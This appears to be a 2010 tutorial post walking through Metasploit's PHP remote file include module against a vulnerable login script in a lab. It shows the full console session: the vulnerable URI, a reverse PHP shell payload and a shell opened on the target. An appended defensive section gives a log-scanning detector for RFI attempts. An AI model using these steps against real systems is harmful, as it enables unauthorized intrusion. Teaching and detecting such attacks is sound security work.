Using the Metasploit PHP Remote File Include Module
2010-07-23 21:15
Metasploit has a nifty PHP Remote File Include module that allows you to get a command shell from an RFI.
It is not complicated to use: set your normal RHOST/RPORT options, set the PATH, and set your PHPURI to the vulnerable path, putting XXpathXX where you would normally put your PHP shell. So we take something like Simple Text-File Login Remote File Include, which has a vulnerable string of:
/[path]/slogin_lib.inc.php?slogin_path=[remote_txt_shell]
and make your PHPURI
PHPURI /slogin_lib.inc.php?slogin_path=XXpathXX
Let's see it in action:
msf > search php_include
[*] Searching loaded modules for pattern 'php_include'...

Exploits
========

   Name                     Rank       Description
   ----                     ----       -----------
   unix/webapp/php_include  excellent  PHP Remote File Include Generic Exploit

msf > use exploit/unix/webapp/php_include
msf exploit(php_include) > info

       Name: PHP Remote File Include Generic Exploit
    Version: 8762
   Platform: PHP
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent

Provided by:
  hdm
  egypt

Available targets:
  Id  Name
  --  ----
  0   Automatic

Basic options:
  Name        Current Setting                                           Required  Description
  ----        ---------------                                           --------  -----------
  PATH        /                                                         yes       The base directory to prepend to the URL to try
  PHPRFIDB    /home/cg/evil/msf3/dev2/data/exploits/php/rfi-locations.dat  no     A local file containing a list of URLs to try, with XXpathXX replacing the URL
  PHPURI                                                                no        The URI to request, with the include parameter changed to XXpathXX
  Proxies                                                               no        Use a proxy chain
  RHOST                                                                 yes       The target address
  RPORT       80                                                        yes       The target port
  SRVHOST     0.0.0.0                                                   yes       The local host to listen on.
  SRVPORT     8080                                                      yes       The local port to listen on.
  SSL         false                                                     no        Negotiate SSL for incoming connections
  SSLVersion  SSL3                                                      no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
  URIPATH                                                               no        The URI to use for this exploit (default is random)
  VHOST                                                                 no        HTTP server virtual host

Payload information:
  Space: 32768

Description:
  This module can be used to exploit any generic PHP file include
  vulnerability, where the application includes code like the
  following:

msf exploit(php_include) > set PHPURI /slogin_lib.inc.php?slogin_path=XXpathXX
PHPURI => /slogin_lib.inc.php?slogin_path=XXpathXX
msf exploit(php_include) > set PATH /1/
PATH => /1/
msf exploit(php_include) > set RHOST 192.168.6.68
RHOST => 192.168.6.68
msf exploit(php_include) > set RPORT 8899
RPORT => 8899
msf exploit(php_include) > set PAYLOAD php/reverse_php
PAYLOAD => php/reverse_php
msf exploit(php_include) > set LHOST 192.168.6.140
LHOST => 192.168.6.140
msf exploit(php_include) > exploit

[*] Started bind handler
[*] Using URL: http://192.168.6.140:8080/RvSIqhdft
[*] PHP include server started.
[*] Sending /1/slogin_lib.inc.php?slogin_path=%68%74%74%70%3a%2f%2f%31%39%32%2e%31%36%38%2e%36%2e%31%34%30%3a%38%30%38%30%2f%52%76%53%49%71%68%64%66%74%3f
[*] Command shell session 1 opened (192.168.6.140:34117 -> 192.168.6.68:8899) at Sun May 09 21:37:26 -0400 2010

dir
0.jpeg          header.inc.php  license.txt     slog_users.txt      version.txt
1.jpeg          index.asp       old             slogin.inc.php
adminlog.php    install.txt     readme.txt      slogin_genpass.php
footer.inc.php  launch.asp      slog_users.php  slogin_lib.inc.php
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
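From the defender's side, the request the module sends stands out in web server logs: the include parameter decodes to a remote URL, and every character of it, letters and digits included, is percent-encoded. The following is an added example, not part of the original post or of Metasploit; the log lines are constructed (the first reuses the request shown above) and the names find_rfi_attempts and inspect_value are assumptions.

```python
import re
from urllib.parse import urlsplit, unquote

# Constructed access-log lines. Line 1 carries the request from the console output above.
SAMPLE_LOG = [
    '192.168.6.140 - - [09/May/2010:21:37:26 -0400] "GET /1/slogin_lib.inc.php?slogin_path='
    '%68%74%74%70%3a%2f%2f%31%39%32%2e%31%36%38%2e%36%2e%31%34%30%3a%38%30%38%30'
    '%2f%52%76%53%49%71%68%64%66%74%3f HTTP/1.1" 200 512',
    '203.0.113.9 - - [09/May/2010:21:41:10 -0400] "GET /1/index.php?return='
    'http%3A%2F%2Fexample.org%2Fhome HTTP/1.1" 302 0',
    '203.0.113.9 - - [09/May/2010:21:41:12 -0400] "GET /1/index.php?page=about%20us '
    'HTTP/1.1" 200 2048',
]

REQUEST = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')
REMOTE = re.compile(r"^\s*(?:https?|ftps?)://", re.I)
# %XX escapes that decode to an ASCII letter or digit; ordinary browsers do not send these.
ENCODED_ALNUM = re.compile(r"%(?:3[0-9]|[46][1-9A-Fa-f]|[57][0-9Aa])")

def inspect_value(raw):
    """Percent-decode one raw parameter value; report whether letters/digits were escaped."""
    return unquote(raw), bool(ENCODED_ALNUM.search(raw))

def find_rfi_attempts(lines):
    """Return one finding per query parameter whose decoded value is a remote URL."""
    hits = []
    for line_no, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        if not match:
            continue  # not an HTTP request line in the expected log format
        url = urlsplit(match.group(1))
        for pair in url.query.split("&"):
            name, _, raw = pair.partition("=")
            value, over_encoded = inspect_value(raw)
            if REMOTE.match(value):
                hits.append({"line": line_no, "path": url.path, "param": name,
                             "value": value, "over_encoded": over_encoded})
    return hits

if __name__ == "__main__":
    for hit in find_rfi_attempts(SAMPLE_LOG):
        print(hit)
```

A hit with over_encoded set to False can be a legitimate redirect parameter, so pair the check with an allowlist of parameters that are expected to carry URLs. On the server itself, PHP's allow_url_include=Off makes include() refuse remote URLs.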